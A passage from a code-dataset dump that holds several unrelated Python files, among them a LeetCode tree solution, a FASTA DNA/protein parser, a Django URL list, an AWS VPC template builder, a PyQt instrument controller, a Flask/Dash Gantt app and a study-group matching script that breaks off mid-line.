val):\n self.val = val\n self.left = self.right = None\n\n\n# Runtime Complexity: O(N)\n# Space Complexity: O(max_depth), which is O(N) in worst case(skewed Tree) or O(max_depth) in case of balanced tree.\nclass Solution:\n def sumRootToLeaf(self, node: TreeNode) -> int:\n if not node:\n return 0\n\n stack = deque()\n stack.append((node, node.val))\n\n total_sum = 0\n\n while stack:\n node, cur_sum = stack.pop()\n\n if not node.left and not node.right:\n total_sum += cur_sum\n\n if node.left:\n stack.append((node.left, cur_sum * 2 + node.left.val))\n\n if node.right:\n stack.append((node.right, cur_sum * 2 + node.right.val))\n\n\n return total_sum\n\n# ---------------------------------------------------\n# Uses DN functions:\n# ---------------------------------------------------\nfrom collections import deque\n\n\ndef createBinaryTreeFromArray(arr):\n if arr is None or len(arr) == 0:\n return None\n\n root_node = TreeNode(arr[0])\n q = deque()\n q.append(root_node)\n\n i = 1\n while q and i < len(arr):\n node = q.popleft()\n\n if node:\n if arr[i] is not None:\n node.left = TreeNode(arr[i])\n q.append(node.left)\n i += 1\n\n if i < len(arr) and arr[i] is not None:\n node.right = TreeNode(arr[i])\n q.append(node.right)\n i += 1\n\n return root_node\n\n\n# ---------------------------------------------------\n# Test Cases\n# ---------------------------------------------------\nsolution = Solution()\nprint(solution.sumRootToLeaf(createBinaryTreeFromArray([1, 0, 1, 0, 1, 0, 1])))\nprint(solution.sumRootToLeaf(createBinaryTreeFromArray([1, None, 0])))\n","sub_path":"topics/Tree/Sum_of_Root_To_Leaf_Binary_Numbers_1022/[Iterative_DFS_stack_with_tuple]_Sum_of_Root_To_Leaf_Binary_Numbers_1022.py","file_name":"[Iterative_DFS_stack_with_tuple]_Sum_of_Root_To_Leaf_Binary_Numbers_1022.py","file_ext":"py","file_size_in_byte":2003,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"79704635","text":"# Robert Bennett - rbennet8@uncc.edu - 2/12/2020\n\n# Sequence - Should hold sequence of each object and a method to print them\n# DNASequence - Holds methods to transcribe (moved from the Sequence class) and translate\n # Can only contain the characters A, T, C, and G\n# ProteinSequence - Holds method to display structure\n # Can only contain the characters M, F, L, C, Y, W, P, H, Q, R, I, T, N, K, S, V, A, D, E, G, AND *\n\n\n#ENTER PATHS TO FASTA SEQUENCES AT THE LINES CONTAINING ################################################################\n\n\n\n# Parent class to DNA and Protein sequences\nclass Sequence:\n def __init__(self, seq):\n self.seq = seq\n\n def __repr__(self):\n return self.seq\n\n\n\n# Child class of Sequence and stores the nucleotide sequence\n# Also has methods to transcribe and translate the sequence to a protein\nclass DNASequence(Sequence):\n def __init__(self, seq):\n # If secondary sequence check passes, then the constructor calls the super class to create the object\n if self.seqCheck(seq):\n super().__init__(seq)\n # Else, a boolean is returned, which prevents the program from continuing\n else:\n return False\n\n # Second check to make sure whatever is being passed is a DNA sequence, in case it isn't submitted via parse method\n def seqCheck(self, seq):\n # Checks all characters in seq to make sure they match all characters in ATCG and returns boolean\n bool = all(x in seq for x in \"ATCG\")\n return bool\n\n # Method that replaces every T in the string with a U and returns string\n # Method from previous lab\n def transcribe(self):\n mrna = self.seq.replace('T', 'U')\n return mrna\n\n # Method that takes transcribed sequence and translates it, then saves the sequence as a protein object\n def translate(self):\n aa_dict = {'M': ['ATG'],\n 'F': ['TTT', 'TTC'],\n 'L': ['TTA', 'TTG', 'CTT', 'CTC', 'CTA', 'CTG'],\n 'C': ['TGT', 'TGC'],\n 'Y': ['TAC', 'TAT'],\n 'W': ['TGG'],\n 'P': ['CCT', 'CCC', 'CCA', 'CCG'],\n 'H': ['CAT', 'CAC'],\n 'Q': ['CAA', 'CAG'],\n 'R': ['CGT', 'CGC', 'CGA', 'CGG', 'AGA', 'AGG'],\n 'I': ['ATT', 'ATC', 'ATA'],\n 'T': ['ACT', 'ACC', 'ACA', 'ACG'],\n 'N': ['AAT', 'AAC'],\n 'K': ['AAA', 'AAG'],\n 'S': ['AGT', 'AGC', 'TCT', 'TCC', 'TCA', 'TCG'],\n 'V': ['GTT', 'GTC', 'GTA', 'GTG'],\n 'A': ['GCT', 'GCC', 'GCA', 'GCG'],\n 'D': ['GAT', 'GAC'],\n 'E': ['GAA', 'GAG'],\n 'G': ['GGT', 'GGC', 'GGA', 'GGG'],\n '*': ['TAA', 'TAG', 'TGA']}\n\n # Declaring variables used for while loop, triplet selection, and protein sequence\n x = 0\n y = 3\n protein = \"\"\n # While the last triplet position is less than the length of the sequence, continue; prevents while loop from searching\n # for bases in an out of bounds index\n while y < len(self.seq):\n # Setting the triplet at the beginning of each loop\n triplet = self.seq[x:y]\n # For the key and value in amino acid disctionary, if triplet matches the value, append key to protein sequence\n for key, val in aa_dict.items():\n if triplet in val:\n protein += key\n # Incrementing for triplets\n x += 3\n y += 3\n # Returns protein object\n return ProteinSequence(protein)\n\n\n\n# Child class of Sequence and stores the protein translation of the sequence\nclass ProteinSequence(Sequence):\n def __init__(self, seq):\n # If secondary sequence check passes, then the constructor calls the super class to create the object\n if self.seqCheck(seq) == True:\n super().__init__(seq)\n # Else, a boolean is returned, which prevents the program from continuing\n else:\n return False\n\n # Second check to make sure whatever is being passed is a DNA sequence, in case it isn't submitted via parse method\n def seqCheck(self, seq):\n # Checks all characters in seq to make sure they match all characters in MFLCYWPHQRITNKSVADEG* and returns boolean\n bool = all(x in seq for x in \"MFLCYWPHQRITNKSVADEG\")\n return bool\n\n # This method would search protein databases for similar sequences and return the structure of the closest match\n def displayStructure(self):\n pass\n\n\n# Takes in a \"label\", which is the name of the sequence, and a sequence object, where the sequence is stored.\nclass SequenceRecord:\n def __init__(self, label, seqObj):\n # Checking to make sure a Sequence object is being passed, by making sure it is an instance of the parent class Sequence,\n # then storing the value\n if isinstance(seqObj, Sequence):\n self.seqObj = seqObj\n self.label = label\n else:\n return False\n\n # Method to return an output for the class\n def __repr__(self):\n return self.label + \"\\n\" + self.seqObj.seq\n\n\n\n# Function that takes in a FASTA file and separates information into separate variables\ndef parse(path):\n label = None\n seq = \"\"\n file = open(path)\n # For loop that increments through each line of the FASTA file\n for line in file:\n # Handles line that begins with >\n if line.startswith(\">\"):\n if label:\n # Checking sequence and handling it accordingly; if 1, create DNA object; if 2, create Protein object\n if checkSeq(seq) == 1:\n seqRecord = SequenceRecord(label, DNASequence(seq))\n yield seqRecord\n elif checkSeq(seq) == 2:\n seqRecord = SequenceRecord(label, ProteinSequence(seq))\n yield seqRecord\n label = None\n seq = \"\"\n label = line.rstrip().lstrip(\">\")\n # If no > then concats line to sequence\n else:\n seq += line.rstrip()\n # Checking sequence and handling it accordingly; if 1, create DNA object; if 2, create Protein object\n if checkSeq(seq) == 1:\n seqRecord = SequenceRecord(label, DNASequence(seq))\n yield (seqRecord)\n elif checkSeq(seq) == 2:\n seqRecord = SequenceRecord(label, ProteinSequence(seq))\n yield seqRecord\n\n# Checks sequence to see if it's protein or DNA, then returns an int or boolean\ndef checkSeq(sequence):\n # if sequence is DNA, return 1\n if all(x in sequence for x in \"ATCG\"):\n return 1\n # If sequence is Protein, return 2\n elif all(x in sequence for x in \"MFLCYWPHQRITNKSVADEG\"):\n return 2\n # If sequence is neither, return boolean and break program to prevent it from conitnuing\n else:\n return False\n\n# Takes in path for FASTA file and passes it to parse method\npath = r'DNA FASTA PATH' ###############################################################################################\ntert = []\nfor seq in parse(path):\n tert.append(seq)\n# Prints out information before and after calling transcription method\nprint(\"Printing name and sequence of DNA FASTA:\\n\", tert[0], \"\\n\")\n\n# Calling transcribe method and printing the result\nrna = tert[0].seqObj.transcribe()\nprint(\"Printing mRNA sequence:\\n\", rna, \"\\n\")\n\n# Prints just the sequence of the obj in the sequence record\nprint(\"Printing just the sequence from the Parent Sequence class:\\n\", tert[0].seqObj, \"\\n\")\n\n# Creating protein variable to hold the object being returned from translate method in DNASequence class and printing it\nprotein = tert[0].seqObj.translate()\nprint(\"Printing the translation of DNA sequence:\\n\", protein, \"\\n\")\n\n# Taking in another path, this time to a protein FASTA, and outputting the information; making sure the program can handle\n# both types of FASTA files\npath2 = r'PROTEIN FASTA PATH' ##########################################################################################\ntertP = []\nfor seq in parse(path2):\n tertP.append(seq)\nprint(\"Printing name and sequence of Protein FASTA:\\n\", tertP[0])","sub_path":"Parser.py","file_name":"Parser.py","file_ext":"py","file_size_in_byte":8273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"442294225","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path(\"installer//sites/\", views.installer_list_sites),\n path(\"listclients/\", views.list_clients),\n path(\"installer/listclients/\", views.installer_list_clients),\n path(\"addclient/\", views.add_client),\n path(\"addsite/\", views.add_site),\n path(\"loadtree/\", views.load_tree),\n path(\"loadclients/\", views.load_clients),\n path(\"initialsetup/\", views.initial_setup),\n]\n","sub_path":"api/tacticalrmm/clients/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"353135330","text":"# -*- coding:utf-8 -*-\n\nimport boto\nimport boto.ec2\nimport boto.vpc\nimport argparse\n\nfrom models import *\n\nclass CloudFormer:\n def __init__(self, access_key, secret_key, vpc_id, region_name='us-east-1'):\n self.access_key = access_key if access_key is not None else ''\n self.secret_key = secret_key if secret_key is not None else ''\n self.region = boto.ec2.get_region(\n region_name,\n aws_access_key_id=self.access_key,\n aws_secret_access_key=self.secret_key\n )\n self.vpc_id = vpc_id\n self.vpc_filter = ('vpc-id', vpc_id)\n self.vpc_attachment_filter = ('attachment.vpc-id', vpc_id)\n\n def form(self):\n self.vpcconn = boto.connect_vpc(\n region=self.region,\n aws_access_key_id=self.access_key,\n aws_secret_access_key=self.secret_key\n )\n context = {}\n self._form_vpc(context)\n self._form_internet_gateway(context)\n self._form_gateway_attachments(context)\n self._form_subnets(context)\n self._form_route_tables(context)\n self._form_instances(context)\n self._form_route(context)\n self._form_subnet_route_table_association(context)\n return context\n\n def _form_vpc(self, context):\n vpcs = self.vpcconn.get_all_vpcs(filters=[self.vpc_filter])\n context['vpc'] = CfnVpc(vpcs[0])\n\n def _form_internet_gateway(self, context):\n context['internet_gateways'] = [CfnInternetGateWay(igw) for igw\n in self.vpcconn.get_all_internet_gateways(\n filters=[self.vpc_attachment_filter]\n )]\n\n def _form_gateway_attachments(self, context):\n internet_gateways = context['internet_gateways']\n attachments = []\n for internet_gateway in internet_gateways:\n attachments.extend([CfnVpcGatewayAttachment(att, internet_gateway) for att in internet_gateway.attachments])\n context['gateway_attachments'] = attachments\n\n def _form_subnets(self, context):\n context['subnets'] = [CfnSubnet(s) for s\n in self.vpcconn.get_all_subnets(\n filters=[self.vpc_filter]\n )]\n\n def _form_route_tables(self, context):\n context['route_tables'] = [CfnRouteTable(rtb) for rtb\n in self.vpcconn.get_all_route_tables(\n filters=[self.vpc_filter]\n )]\n\n def _form_instances(self, context):\n instances = []\n for reservation in self.vpcconn.get_all_instances(filters={'vpc-id': self.vpc_id}):\n for instance in reservation.instances:\n instances.append(CfnEC2Instance(instance))\n context['instances'] = instances\n\n def _form_route(self, context):\n route_tables = context['route_tables']\n routes = []\n for route_table in route_tables:\n routes.extend([CfnRoute(route, route_table) for route in route_table.routes])\n context['routes'] = routes\n\n def _form_subnet_route_table_association(self, context):\n route_tables = context['route_tables']\n associations = []\n for route_table in route_tables:\n associations.extend([CfnSubnetRouteTableAssociation(assoc) for assoc in route_table.associations])\n context['subnet_route_table_associations'] = associations\n\n","sub_path":"lib/floccus/former.py","file_name":"former.py","file_ext":"py","file_size_in_byte":3429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"91046151","text":"import os\nfrom datetime import datetime\nfrom PyQt5 import QtCore\nfrom Driver.STM_Interface import STM_Interface\nfrom Driver.IO_Plots import IO_Plots\nfrom Driver.FSM import State, Transition, FSM\nfrom Driver.Actions import List_Actions, Action, No_Action\nfrom Driver.Conditions import Condition, Condition_Empty, Cond_SA_Ready, Cond_SA_Operation, Cond_UniqueTransition\n\nclass ListControllers(object):\n\tdef __init__(self):\n\t\tself.Controllers = {}\n\n\tdef addController(self, controller):\n\t\tself.Controllers[controller.name] = controller\n\n\tdef isBusy(self):\n\t\tfor i in self.Controllers.keys():\n\t\t\tif self.Controllers[i].ControllerBusy == True:\n\t\t\t\treturn True\n\t\treturn False\n\t\t\n\tdef FinishAllActions(self):\n\t\t# To be done\n\t\tpass\n\nclass Controller(object):\n\tdef __init__(self, name, Interface, Timeout=10):\n\n\t\t#########################################\n\t\t# EACH CONTROLLER INCLUDES AT LEAST:\t#\n\t\t# - A list of actions\t\t\t#\n\t\t# - An FSM with:\t\t\t#\n\t\t# \t-> States [Action + Condition]\t#\n\t\t#\t-> Transition [Action]\t\t#\n\t\t# - A timer that ticks the FSM\t\t#\n\t\t# - A pointer to the STM Interface\t#\n\t\t#########################################\n\t\tself.name = name\n\t\tself.FSM = FSM(self)\n\t\tself.Plots = IO_Plots()\n\t\tself.Timer = QtCore.QTimer()\n\t\tself.Timer.timeout.connect(self.FSM.Execute)\n\t\tself.Timeout = Timeout\n\t\tself.Interface = Interface\t\n\n\t\t#########################\n\t\t# Actions Definitions\t#\n\t\t#########################\n\t\tself.Actions = List_Actions(self)\n\t\tself.Actions.Create_Action(\"STM\", \"Frame\", \"RequestFrame\", 6)\n\t\tself.Actions.Create_Action(\"STM\", \"Frame\", \"CharactCurves\", 7)\n\t\tself.Actions.Create_Action(\"STM\", \"Frame\", \"CalibArray\", 8)\n\t\tself.Actions.Create_Action(\"STM\", \"Frame\", \"LAMP\", 10)\n\t\tself.Actions.Create_Action(\"STM\", \"RefTemp\", \"PCR\", 11)\n\t\tself.Actions.Create_Action(\"STM\", \"RefTemp\", \"TempControl\", 12, 95.0)\n\t\tself.Actions.Create_Action(\"STM\", \"Frame\", \"TempCharact\", 13)\n\t\tself.Actions.Create_Action(\"STM\", \"RefTemp\", \"TempRefMeas\", 14)\n\t\tself.Actions.Create_Action(\"STM\", \"Pixel\", \"TempNoise\", 15)\n\t\tself.Actions.Create_Action(\"STM\", \"RefTemp\", \"TempCoilCharact\", 16)\n\t\tself.Actions.Create_Action(\"STM\", \"RefTemp\", \"TempCoilDynamics\", 17)\n\t\tself.Actions.Create_Action(\"STM\", \"Frame\", \"WaveGen\", 18)\n\t\tself.Actions.Create_Action(\"STM\", \"Pixel\", \"ChemNoise\", 19)\n\t\tself.Actions.Create_Action(\"STM\", \"Frame\", \"MultipleFrames\", 20, 10.0)\n\t\tself.Actions.Create_Action(\"STM\", \"Frame\", \"SampleFor10Minutes\", 21, 10.0)\n\t\tself.Actions.Create_Action(\"STM\", \"Frame\", \"DACSensitivityTest\", 22)\n\t\tself.No_Action = No_Action()\n\n\t\tself.ControllerBusy = False\n\t\tself.InterruptEnable = False\n\t\tself.InterruptAction = None\n\t\tself.InterruptReady = False\n\n\tdef LaunchController(self, cargo, Plot_3D, Plot_2D, Text = None):\n\t\tself.ControllerBusy = True\n\t\tself.Timer.start(self.Timeout)\n\t\tself.DefinePlots(Plot_3D, Plot_2D)\n\t\tif Text != None:\n\t\t\tself.DefineTextBox(Text)\n\n\tdef StopController(self):\n\t\tself.Timer.stop()\n\t\tself.ControllerBusy = False\n\n\tdef DefinePlots(self, Plot_3D, Plot_2D):\n\t\tself.Plots.SetupPlots(Plot_3D, Plot_2D)\n\n\tdef DefineTextBox(self, Text):\n\t\tself.Plots.SetupText(Text)\n\n\tdef EnableInterrupt(self, Action):\n\t\tself.InterruptEnable = True\n\n\tdef DisableInterrupt(self):\n\t\tself.InterruptEnable = False\n\n\tdef DataTransferBetweenStates(self, StateName_Sender, StateName_Receiver):\n\t\tself.FSM.states[StateName_Receiver].Action.action_data = self.FSM.states[StateName_Sender].Action.action_data\t\n\nclass debug_Controller(Controller):\n\tdef __init__(self, name, Interface, Timeout=10):\n\n\t\tself.SavePath = \"Results/Debug\"\n\t\tif not os.path.exists(self.SavePath):\n\t\t\tos.makedirs(self.SavePath)\n\t\tsuper(debug_Controller, self).__init__(name,Interface,Timeout)\n\n\t\tself.FSM.AddState(\"Ready\",self.No_Action, Cond_SA_Ready())\n\t\tself.FSM.AddState(\"Single_RequestFrame\",self.Actions.Assing(\"RequestFrame\"), Cond_SA_Operation())\n\t\tself.FSM.AddState(\"Single_CharactCurves\",self.Actions.Assing(\"CharactCurves\"), Cond_SA_Operation())\n\t\tself.FSM.AddState(\"Single_CalibArray\", self.Actions.Assing(\"CalibArray\"), Cond_SA_Operation())\n\t\tself.FSM.AddState(\"Single_LAMP\", self.Actions.Assing(\"LAMP\"), Cond_SA_Operation())\n\t\tself.FSM.AddState(\"Single_PCR\", self.Actions.Assing(\"PCR\"), Cond_SA_Operation())\n\t\tself.FSM.AddState(\"Single_TempControl\", self.Actions.Assing(\"TempControl\"), Cond_SA_Operation())\n\t\tself.FSM.AddState(\"Single_TempCharact\", self.Actions.Assing(\"TempCharact\"), Cond_SA_Operation())\n\t\tself.FSM.AddState(\"Single_ObtainRefTemp\", self.Actions.Assing(\"TempRefMeas\"), Cond_SA_Operation())\n\t\tself.FSM.AddState(\"Single_TempNoise\", self.Actions.Assing(\"TempNoise\"), Cond_SA_Operation())\n\t\tself.FSM.AddState(\"Single_TempCoilCharact\", self.Actions.Assing(\"TempCoilCharact\"), Cond_SA_Operation())\n\t\tself.FSM.AddState(\"Single_TempCoilDynamics\", self.Actions.Assing(\"TempCoilDynamics\"), Cond_SA_Operation())\n\t\tself.FSM.AddState(\"Single_WaveGen\", self.Actions.Assing(\"WaveGen\"), Cond_SA_Operation())\n\t\tself.FSM.AddState(\"Single_ChemNoise\", self.Actions.Assing(\"ChemNoise\"), Cond_SA_Operation())\n\t\tself.FSM.AddState(\"Single_MultipleFrames\", self.Actions.Assing(\"MultipleFrames\"), Cond_SA_Operation())\n\t\tself.FSM.AddState(\"Single_SampleFor10Minutes\", self.Actions.Assing(\"SampleFor10Minutes\"), Cond_SA_Operation())\t\t\n\t\tself.FSM.AddState(\"Done\", self.No_Action, Condition_Empty())\n\t\tself.FSM.SetState(\"Done\")\n\t\t\n\t\tself.FSM.AddTransition(\"toRequestFrame\",Transition(\"Single_RequestFrame\",self.Plots.ClearAllPlots))\n\t\tself.FSM.AddTransition(\"toCharactCurves\",Transition(\"Single_CharactCurves\",self.Plots.ClearAllPlots))\n\t\tself.FSM.AddTransition(\"toCalibArray\",Transition(\"Single_CalibArray\",self.Plots.ClearAllPlots))\n\t\tself.FSM.AddTransition(\"toLAMP\",Transition(\"Single_LAMP\",self.Plots.ClearAllPlots))\n\t\tself.FSM.AddTransition(\"toPCR\",Transition(\"Single_PCR\",self.Plots.ClearAllPlots))\n\t\tself.FSM.AddTransition(\"toTempControl\",Transition(\"Single_TempControl\",self.Plots.ClearAllPlots))\n\t\tself.FSM.AddTransition(\"toTempCharact\",Transition(\"Single_TempCharact\",self.Plots.ClearAllPlots))\n\t\tself.FSM.AddTransition(\"toObtainRefTemp\",Transition(\"Single_ObtainRefTemp\",self.Plots.ClearAllPlots))\n\t\tself.FSM.AddTransition(\"toTempNoise\",Transition(\"Single_TempNoise\",self.Plots.ClearAllPlots))\n\t\tself.FSM.AddTransition(\"toTempCoilCharact\",Transition(\"Single_TempCoilCharact\",self.Plots.ClearAllPlots))\n\t\tself.FSM.AddTransition(\"toTempCoilDynamics\",Transition(\"Single_TempCoilDynamics\",self.Plots.ClearAllPlots))\n\t\tself.FSM.AddTransition(\"toWaveGen\",Transition(\"Single_WaveGen\",self.Plots.ClearAllPlots))\n\t\tself.FSM.AddTransition(\"toChemNoise\",Transition(\"Single_ChemNoise\",self.Plots.ClearAllPlots))\n\t\tself.FSM.AddTransition(\"toMultipleFrames\",Transition(\"Single_MultipleFrames\",self.Plots.ClearAllPlots))\n\t\tself.FSM.AddTransition(\"toSampleFor10Minutes\",Transition(\"Single_SampleFor10Minutes\",self.Plots.ClearAllPlots))\n\t\tself.FSM.AddTransition(\"toDone\",Transition(\"Done\",self.StopController))\t\t\n\n\tdef LaunchController(self, cargo, Plot_3D, Plot_2D, Text = None):\n\t\tself.StartTime = datetime.now()\n\t\tself.SavePath = \"Results/Debug/\" + self.StartTime.strftime(\"%Y-%d-%b_%H-%M-%S\")\n\t\tif not os.path.exists(self.SavePath):\n\t\t\tos.makedirs(self.SavePath)\n\n\t\tself.FSM.SetSavePath(self.SavePath)\n\t\tself.FSM.SetCargo(cargo)\n\t\tself.FSM.SetState(\"Ready\")\n\t\tsuper(debug_Controller, self).LaunchController(cargo, Plot_3D, Plot_2D, Text = None)\n\nclass DriftAnalysis_Controller(Controller):\n\tdef __init__(self, name, Interface, Timeout=10):\n\t\t\n\t\tself.SavePath = \"Results/Drift\"\n\t\tif not os.path.exists(self.SavePath):\n\t\t\tos.makedirs(self.SavePath)\n\t\tsuper(DriftAnalysis_Controller, self).__init__(name,Interface,Timeout)\n\n\t\t## STATES ##\n\t\tself.FSM.AddState(\"Ready\",self.No_Action, Cond_UniqueTransition(\"InitialCalibration\"))\n\t\tself.FSM.AddState(\"InitialCalibration\", self.Actions.Assing(\"CalibArray\"), Cond_UniqueTransition(\"DACSensitivity\"))\n\t\tself.FSM.AddState(\"DACSensitivity\", self.Actions.Assing(\"DACSensitivityTest\"), Cond_UniqueTransition(\"InitialDriftSampling\"))\n\t\tself.FSM.AddState(\"InitialDriftSampling\", self.Actions.Assing(\"SampleFor10Minutes\"), Cond_UniqueTransition(\"Done\"))\n\t\tself.FSM.AddState(\"Done\", self.No_Action, Condition_Empty())\n\t\tself.FSM.SetState(\"Done\")\n\n\t\t## TRANSITIONS ##\n\t\tself.FSM.AddTransition(\"toInitialCalibration\",Transition(\"InitialCalibration\",self.Plots.ClearAllPlots))\n\t\tself.FSM.AddTransition(\"toDACSensitivity\",Transition(\"DACSensitivity\",self.Plots.ClearAllPlots))\n\t\tself.FSM.AddTransition(\"toInitialDriftSampling\",Transition(\"InitialDriftSampling\",self.Plots.ClearAllPlots))\n\t\tself.FSM.AddTransition(\"toDone\",Transition(\"Done\",self.StopController))\t\t\n\n\tdef LaunchController(self, cargo, Plot_3D, Plot_2D, Text = None):\n\t\tself.StartTime = datetime.now()\n\t\tself.SavePath = \"Results/Drift/\" + self.StartTime.strftime(\"%Y-%d-%b_%H-%M-%S\")\n\t\tif not os.path.exists(self.SavePath):\n\t\t\tos.makedirs(self.SavePath)\n\n\t\tself.FSM.SetSavePath(self.SavePath)\n\t\tself.FSM.SetCargo(cargo)\n\t\tself.FSM.SetState(\"Ready\")\n\n\t\tsuper(DriftAnalysis_Controller, self).LaunchController(cargo, Plot_3D, Plot_2D, Text = None)\n","sub_path":"instantDNA_GUI-v1.0/Driver/Controller.py","file_name":"Controller.py","file_ext":"py","file_size_in_byte":9011,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"97417289","text":"# -*- coding: utf-8 -*-\r\n\r\nfrom flask import Flask, render_template\r\nfrom flask_httpauth import HTTPBasicAuth\r\nfrom flask_bootstrap import Bootstrap\r\n\r\nimport dash\r\nimport dash_auth\r\nimport dash_core_components as dcc\r\nimport dash_html_components as html\r\n\r\nimport datetime\r\nimport os\r\nimport modules.MakeGantt as mg\r\nimport plotly.figure_factory as ff\r\n\r\n# portはIBM Cloud環境から割り当てられたものを利用\r\nif os.getenv('VCAP_APP_PORT'):\r\n import metrics_tracker_client\r\n # Trackingするなら必要\r\n metrics_tracker_client.track()\r\n host = '0.0.0.0'\r\n port = port = os.getenv('VCAP_APP_PORT', '8000')\r\nelse:\r\n # ローカル用の設定\r\n host = '127.0.0.1'\r\n port = 5000\r\n\r\nserver = Flask(__name__)\r\nbootstrap = Bootstrap(server)\r\napp = dash.Dash(__name__, server=server)\r\n# external_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']\r\n# app = dash.Dash(__name__, external_stylesheets=external_stylesheets)\r\n\r\nVALID_USERNAME_PASSWORD_PAIRS = [\r\n ['*****', '*****']\r\n]\r\nusers = {\r\n \"*****\": \"*****\"\r\n}\r\n\r\nauth = dash_auth.BasicAuth(\r\n app,\r\n VALID_USERNAME_PASSWORD_PAIRS\r\n)\r\nauth_flask = HTTPBasicAuth()\r\n\r\n# グラフ作成のモジュール\r\ngantt = mg.Test()\r\n\r\n@auth_flask.get_password\r\ndef get_pw(username):\r\n if username in users:\r\n return users.get(username)\r\n return None\r\n\r\n# 直観的にわかりづらいので children は削除\r\ndef serve_layout():\r\n \r\n fig_task = gantt.task()\r\n fig_member = gantt.member()\r\n \r\n \r\n return html.Div([\r\n html.Div([\r\n html.H1('**********'),\r\n html.Div('** ここには各ページのリンクを張る予定 **'),\r\n html.A('Navigate to \"コンテンツTOPページ\"', href='./top'),\r\n html.Br(),\r\n html.Br(),\r\n html.Div('*********'),\r\n ]\r\n , style={'background-color': '#eeeeee'}\r\n ),\r\n html.Div([dcc.Graph(figure=fig_task, id='gantt_task')]\r\n ), \r\n \r\n html.Div(dcc.Graph(figure=fig_member, id='gantt_member')\r\n ),\r\n ])\r\n\r\napp.layout = serve_layout\r\n\r\n# 念のため用意\r\n@server.route('/')\r\ndef index():\r\n return \"Hello World\"\r\n\r\n@server.route('/top')\r\n@auth_flask.login_required\r\ndef indexTwo():\r\n return render_template('index.html')\r\n\r\n#@app.callback()\r\n@server.route('/test')\r\ndef test():\r\n\r\n return \"\"\r\n\r\nif __name__ == \"__main__\":\r\n server.run(host=host, port=int(port), debug=True, threaded=True)\r\n app.run_server(debug=True)\r\n ","sub_path":"guntchart_plotly-dash_ibm/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"380240607","text":"import pandas as pd\nimport openpyxl\nimport numpy as np\nfrom collections import defaultdict\n\ndef get_num_people(df_alone_type):\n num_ppl = []\n df_alone_type = df_alone_type.sort_values(['study_with','preference', 'code_1', 'prof_1'], ascending=True).reset_index()\n num_by_code_prof = df_alone_type.groupby([\"code_1\", \"prof_1\"]).size().reset_index(name='counts')\n sum = 0\n for index1, row in num_by_code_prof.iterrows():\n num_ppl.append(row['counts'])\n sum = sum + row['counts']\n return num_ppl\n\ndef allocate_groups_dict(df_alone, groups, cannot_grouped, num_ppl) :\n idx = 0\n for num in num_ppl :\n\n if num <= 2 :\n for i in range(0, num):\n value = df_alone.iloc[idx: idx + 1]\n cannot_grouped.add(value['sid'].values[0])\n idx += 1\n\n else:\n for i in range(0, num):\n value = df_alone.iloc[idx : idx + 1]\n lect = '{}_{}'.format(value['code_1'].values[0], value['prof_1'].values[0])\n\n if lect not in groups.keys():\n groups[lect] = set()\n groups[lect].add(value['sid'].values[0])\n\n idx += 1\n\ndef get_num_people_rest(df_alone_type):\n num_ppl = []\n df_alone_type = df_alone_type.sort_values(['code_1'], ascending=True).reset_index()\n num_by_code_prof = df_alone_type.groupby([\"code_1\"]).size().reset_index(name='counts')\n for index1, row in num_by_code_prof.iterrows():\n num_ppl.append(row['counts'])\n return num_ppl\n\ndef allocate_rest_to_other_groups_code(df_grouped_rest, offline_groups, online_groups, anything_groups, hope_col) :\n for index, row in df_grouped_rest.iterrows() :\n status = False\n searching_group = [offline_groups, online_groups, anything_groups]\n\n for i in range(3):\n if row['preference'] != 3 and i == row['preference'] - 1:\n continue\n for key in searching_group[i].keys():\n if key.rsplit('_', 1)[0] == row[hope_col] :\n searching_group[i][key].add(row['sid']) \n ungrouped[['offline', 'online', 'anything'][row['preference'] - 1]].discard(row['sid'])\n status = True\n break\n if status == True : \n status = False\n break\n\ndef automatch(df):\n df = pd.read_csv('Study_Match_Revised.csv', header = 0, index_col = False, names = ['timestamp', 'email', 'id', 'name', 'gender', 'phone', 'preference', 'study_with', 'code_1', 'name_1', 'prof_1', 'code_2', 'name_2', 'prof_2', 'code_3', 'name_3', 'prof_3', 'etc', 'etc_q1', 'etc_q2', 'etc_q3', 'etc_q4', 'agreement'])\n\n origin_col_name = df.columns\n changed_col_name = ['timestamp', 'email', 'sid', 'name', 'gender', 'phone', 'preference', 'study_with', 'code_1', 'name_1', 'prof_1', 'code_2', 'name_2', 'prof_2', 'code_3', 'name_3', 'prof_3', 'etc', 'etc_q1', 'etc_q2', 'etc_q3', 'etc_q4', 'agreement']\n\n df = df.set_axis(changed_col_name, axis = 1)\n df.insert(0, 'group', [0 for _ in range(len(df))], True)\n df['timestamp'] = pd.to_datetime(df['timestamp'])\n df.at[df['agreement'] == '아니오', 'group'] = -1\n df = df.drop(df[pd.isnull(df['timestamp'])].index)\n\n df = df[['group', 'sid', 'gender', 'name', 'email', 'phone', 'timestamp', 'preference', 'study_with', 'code_1', 'prof_1', 'code_2', 'prof_2', 'code_3', 'prof_3']]\n df['preference'] = df['preference'].replace({'대면 스터디로만 매칭' : 1, '비대면 스터디로만 매칭' : 2, '비대면/대면 병행 상관없음' : 3})\n\n df['prof_1'] = df['prof_1'].str.replace(\"교수님\", \"\").str.strip()\n df['prof_2'] = df['prof_2'].str.replace(\"교수님\", \"\").str.strip()\n df['prof_3'] = df['prof_3'].str.replace(\"교수님\", \"\").str.strip()\n\n # 과목코드 upper_case + space\n df['code_1'] = df['code_1'].str.upper().str.strip()\n df['code_2'] = df['code_2'].str.upper().str.strip()\n df['code_3'] = df['code_3'].str.upper().str.strip()\n\n group_num = 1\n\n # 1. 같이 하는 사람들끼리 먼저 그룹 만들기 (현재 2명만 받았음, 이름이라 애매) => 미완성\n groups_tmp = []\n friend_groups = []\n uncompleted_groups = []\n cannot_grouped_friends = []\n\n df_friends = df.loc[df['study_with'].notnull()] # + 개인정보 동의한 